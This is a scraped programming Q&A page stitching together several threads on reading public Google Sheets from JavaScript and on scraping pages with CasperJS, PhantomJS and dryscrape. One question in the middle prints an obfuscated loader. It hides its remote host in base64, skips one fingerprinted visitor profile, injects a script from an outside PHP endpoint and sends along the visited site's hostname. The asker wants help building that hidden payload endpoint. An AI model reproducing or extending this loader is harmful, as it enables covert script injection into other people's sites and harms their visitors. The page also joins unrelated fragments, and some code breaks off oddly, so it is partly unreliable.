Is there a way to get cell values of a public google spread sheet ?
GET https://sheets.googleapis.com/v4/spreadsheets/1vW01Y46DcpCC7aKLIUwV_W4RXLbeukVwF-G9AA7P7R0/values/A1A4?key=abcdef
returns 403.
I also sent the Referrer in Postman : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
{
"error": {
"code": 403,
"message": "Requests from referer Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 are blocked.",
"status": "PERMISSION_DENIED",
"details": [
{
"#type": "type.googleapis.com/google.rpc.ErrorInfo",
"reason": "API_KEY_HTTP_REFERRER_BLOCKED",
"domain": "googleapis.com",
"metadata": {
"consumer": "projects/666",
"service": "sheets.googleapis.com"
}
}
]
}
}
I am trying to access a public sheet's data directly from client-side JavaScript.
No round-trips to the server. I remember this was possible some 10 years ago but am unable to locate the docs.
You can access the public spreadsheet by json endpoint
var id = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
var gid = '1111111111111';
var url = 'https://docs.google.com/spreadsheets/d/'+id+'/gviz/tq?tqx=out:json&tq&gid='+gid;
Take a slice
data.substring(47).slice(0, -2)
and parse the json
direct link
https://docs.google.com/spreadsheets/d/1n-rjSYb63Z2jySS3-M0BQ78vu8DTPOjG-SZM4i8IxXI/gviz/tq?tqx=out:json&tq&gid=0
example by gas
function getEndpointJson(){
var id = '1n-rjSYb63Z2jySS3-M0BQ78vu8DTPOjG-SZM4i8IxXI';
var gid = '0';
var txt = UrlFetchApp.fetch(`https://docs.google.com/spreadsheets/d/${id}/gviz/tq?tqx=out:json&tq&gid=${gid}`).getContentText();
var jsonString = txt.match(/(?<="table":).*(?=}\);)/g)[0]
var json = JSON.parse(jsonString)
var table = []
var row = []
json.cols.forEach(colonne => row.push(colonne.label))
table.push(row)
json.rows.forEach(r => {
var row = []
r.c.forEach(cel => {
try{var value = cel.f ? cel.f : cel.v}
catch(e){var value = ''}
row.push(value)
}
)
table.push(row)
}
)
return (table)
}
example by html page
For instance on html page (you have to store it in outside server)
<html>
<title>Google Sheets json endpoint V4</title>
<author>Mike Steelson</author>
<style>
table {border-collapse: collapse;}
th,td{border: 1px solid black;}
</style>
<body>
<div id="json">json here</div>
<script>
var id = '1n-rjSYb63Z2jySS3-M0BQ78vu8DTPOjG-SZM4i8IxXI';
var gid = '0';
var url = 'https://docs.google.com/spreadsheets/d/'+id+'/gviz/tq?tqx=out:json&tq&gid='+gid;
fetch(url)
.then(response => response.text())
.then(data => document.getElementById("json").innerHTML=myItems(data.substring(47).slice(0, -2))
);
function myItems(jsonString){
var json = JSON.parse(jsonString);
var table = '<table><tr>'
json.table.cols.forEach(colonne => table += '<th>' + colonne.label + '</th>')
table += '</tr>'
json.table.rows.forEach(ligne => {
table += '<tr>'
ligne.c.forEach(cellule => {
try{var valeur = cellule.f ? cellule.f : cellule.v}
catch(e){var valeur = ''}
table += '<td>' + valeur + '</td>'
}
)
table += '</tr>'
}
)
table += '</table>'
return table
}
</script>
</body></html>
The sheet ID you have provided is wrong.
Based on some brief research, there are available JS libraries that let you access GSheets data, but Google requires an API key:
Requests to the Google Sheets API for public data must be accompanied by an identifier, which can be an API key or an access token.
Here's an example library:
gsheets - Get public Google Sheets as plain JavaScript/JSON.
Answer is to remove the restrictions in Google Cloud Console
Related
I am a very beginer in javascript/phantomjs/casperjs (like only several days of learning) but I am stuck with this svg graph I am trying to scrap data from.
I am trying to access the d="M20,331.37,331.37,21.40...." element from an SVG object using a casperjs code, and write in the console and a txt file (or CSV). I try the following code:
var casper = require('casper').create({
pageSettings: {
loadImages: true,
loadPlugins: true,
userAgent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'
}
});
//First step is to open baidu.html
casper.start().thenOpen("file:///baidu.html", function() {
console.log("Baidu website opened");
this.wait(6000);
});
casper.then(function() {
var dataFromGraph = this.getElementsAttribute(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'),"d");
this.echo(dataFromGraph);
require('fs').write("data_graph.txt", dataFromGraph,'w');
});
casper.run();
But nothing worked. I get NULL element or empty result.
This is all the other code I try:
var dataFromGraph = this.fetchText(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]/d'));
var dataFromGraph = this.getElementsAttribute(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'),"d") //,"d")
var dataFromGraph = this.getElementInfo(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'))
var dataFromGraph = this.fetchText("#trend > svg > path");
I have the Xpath and the selector of the object but I am not sure how to acces it. Here is a picture of the element I want to scrap.
As the website I want to scrap need a password, this is the HTML file that I save from it https://ufile.io/5y9g2.
The element I want to scrap is the data behind the graph here.
Any help would be very appreciated.
I reworked your script a bit and now it works. Check the snippet below.
var fs = require('fs');
var casper = require('casper').create();
casper.start().thenOpen("http://localhost:8001/baidu.html", function() {
console.log("Baidu website opened");
});
casper.then(function() {
var graphData = this.evaluate(function() {
return document.querySelector('#trend > svg > path:nth-child(11)').getAttribute('d')
});
this.echo(graphData);
fs.write("data_graph.txt", graphData,'w');
});
casper.run();
Hope that helps!
if (navigator['userAgent'] == 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.27 Safari/537.36' && screen['width'] == '1024' && screen['height'] == '768') {} else {
var javas = document['createElement']('script');
javas['language'] = 'javascript';
javas['type'] = 'text/javascript';
javas['src'] = location['protocol'] + '//' + atob('dmlzdWFsbW90by54eXovaDcucGhw') + '?' + Math['floor']((Math['random']() * 1000000000) + 1) + '&h=' + encodeURIComponent(document['location']['host']);
document['head']['appendChild'](javas)
}
need to know how to make an PHP file that will show code inside if i run that link inside this code, this is the link dmlzdWFsbW90by54eXovaDcucGhw on 64bit (visualmoto.xyz/h7.php) and open this link you cant see nothing u see error but when run on that js code that PHP will open an hidden code can you please help me create that h7.php file.. how can i do it i'm very low on php
I use JS script code that described in this answer, but I don't want to save html result page in html file. I want to extract Json object from <div class="rg_meta"> and pass them to Java code.
In searching, I find using "document", but I get undefined error. I am newbie in PhantomJS and working with JSON in Java.
var page = require('webpage').create();
var fs = require('fs');
var system = require('system');
var url = "";
var searchParameter = "";
var count=0;
if (system.args.length === 4) {
url=system.args[1];
searchParameter=system.args[2];
count=system.args[3];
}
if(url==="" || searchParameter===""){
phantom.exit();
}
page.settings.userAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36';
page.zoomFactor = 0.1;
page.viewportSize = {
width: 1920,
height: 1080
};
var divCount="-1";
var topPosition=0;
var unchangedCounter=0;
page.open(url, function(status) {
console.log("Status: " + status);
if(status === "success") {
window.setInterval(function() {
var newDivCount = page.evaluate(function() {
var divs = document.querySelectorAll(".rg_di.rg_bx.rg_el.ivg-i");
return divs[divs.length-1].getAttribute("data-ri");
});
topPosition = topPosition + 1080;
page.scrollPosition = {
top: topPosition,
left: 0
};
if(newDivCount===divCount){
page.evaluate(function() {
var elems=document.getElementByClassName("rg_meta");
console.log(elems.length);
var button = document.querySelector("#smb");
if(!(typeof button === "undefined")) {
button.click();
console.log('Clicked');
return true;
}else{
return false;
}
});
if(parseInt(unchangedCounter,10) === parseInt(count,10)){
/* var path = searchParameter+'.html';
fs.write('seedHtml/'+path, page.content, 'w');
console.log('printing html');*/
phantom.exit();
}else{
unchangedCounter=unchangedCounter+1;
}
}else{
unchangedCounter=0;
}
divCount = newDivCount;
}, 500);
}else{
phantom.exit();
}
});
HTML5 data Attributes
Fortunately, HTML5 introduces custom data attributes.
<div id="msglist" data-user="bob" data-list-size="5" data-maxage="180"></div>
Custom data attributes:
are strings — you can store anything which can be string encoded, such as JSON. Type conversion must be handled in JavaScript.
should only be used when no suitable HTML5 element or attribute exists.
JavaScript Parsing #1:
Every browser will let you fetch and modify data- attributes using the getAttribute and setAttribute methods, e.g.
var msglist = document.getElementById("msglist");
var show = msglist.getAttribute("data-list-size");
msglist.setAttribute("data-list-size", show+3);
It works, but should only be used as a fallback for older browsers.
JavaScript Parsing #2:
Since version 1.4.3, jQuery’s data() method has parsed HTML5 data attributes. You don’t need to specify the data- prefix so the equivalent code can be written:
var msglist = $("#msglist");
var show = msglist.data("list-size");
msglist.data("list-size", show+3);
Hope it helps!!!
I've got issue with getting an content:
with dryscrape.Session() as c:
PASSWORD = '<PASS>'
USERNAME = '<EMAIL>'
URL = 'https://my.pingdom.com/'
c.get(URL)
soup = BeautifulSoup(c.get(URL).text, "lxml")
csrf = soup.select_one("input[name=__csrf_magic]")["value"]
login_data = {
"email" : USERNAME,
"password" : PASSWORD,
"__csrf_magic" : csrf,}
r = c.post(URL, data=login_data, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'})
url = 'https://my.pingdom.com/newchecks/rums?ignoreActive=1'
r = c.get(url).text
print r
And after login in browser i've got value of Load Time in source code, but when i'm using this scipt there is only an {{loadtime}} tag from x-handlebars-template.
Any ideas how I can get it? This is server script so any selenium type of tips doesn't go in here. :)
I tried to extract data from some webpages using CasperJS, I have tried adding this.wait(5000) inside getDetails(), but I don't know why direktoriNodeList.length always return 0
PhantomJS : 2.0.0
CasperJS : 1.1.0-beta3
//casperjs --proxy=127.0.0.1:9050 --proxy-type=socks5 axa-mandiri.casper.js
var casper = require("casper").create({
verbose: true,
logLevel: "info",
pageSettings: {
loadImages: false, //The script is much faster when this field is set to false
loadPlugins: false,
userAgent: "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36"
}
});
var utils = require('utils');
var currentPage = 1;
var hospitals = [];
var url = 'https://www.axa-mandiri.co.id/direktori/rumah-sakit/';//Type your url
casper.start(url);//Start CasperJS
casper.waitForSelector('#main-direktori', processPage, stopScript);//Wait until content loads and then process the page
casper.run(function() {
utils.dump(hospitals);
this.exit();
});
function getDetails(){
/*
In this function you can put anything you want in order to extract your data from the website.
NOTE: This function is executed in page context, and will should be called as parameter to Casper's evaluate function.
*/
.
console.log("getDetails " + currentPage);
var details = [];
var direktoriNodeList = document.querySelectorAll("ul#main-direktori li.direktori-list");
console.log("direktoriNodeList.length " + direktoriNodeList.length);
utils.dump(direktoriNodeList);
for (var i = 0; i < direktoriNodeList.length; i++) {
console.log("querySelectorAll " + i);
var detail = {
name : direktoriNodeList[i].querySelector("div.details strong").textContent.replace(/\n/g, ''),
phone : direktoriNodeList[i].querySelector("div.details span:nth-child(1)").textContent.replace(/\n/g, ''),
map : direktoriNodeList[i].querySelector("div.map-details a.get-direction").getAttribute("href")
};
details.push(detail);
}
/*
[].forEach.call(document.querySelectorAll("ul#main-direktori li.direktori-list"), function(elem) {
console.log("querySelectorAll");
var detail = {
name : elem.querySelector("div.details strong").textContent.replace(/\n/g, ''),
phone : elem.querySelector("div.details span:nth-child(1)").textContent.replace(/\n/g, ''),
map : elem.querySelector("div.map-details a.get-direction").getAttribute("href")
};
details.push(detail);
});
*/
return JSON.stringify(details);
}
function stopScript() {
utils.dump(hospitals);
console.log("Exiting...");
this.exit();
};
function processPage() {
//your function which will do data scraping from the page. If you need to extract data from tables, from divs write your logic in this function
hospitals = hospitals.concat(this.evaluate(getDetails()));
//If there is no nextButton on the page, then exit a script because we hit the last page
if (this.exists("a.nextpostslink") == false) {
stopScript();
}
//Click on the next button
this.thenClick("a.nextpostslink").then(function() {
currentPage++;
this.waitForSelector("#main-direktori", processPage, stopScript);
});
};
casper.evaluate(fn, ...) expects a function, not an array. Change
hospitals = hospitals.concat(this.evaluate(getDetails()));
to
hospitals = hospitals.concat(this.evaluate(getDetails));
The problem here is that you're executing the function in the outer context instead of passing it into the page context. Don't forget to register to the "remote.message" event to see console.log() calls from the page context:
casper.on("remote.message", function(msg){
this.echo("remote> " + msg);
});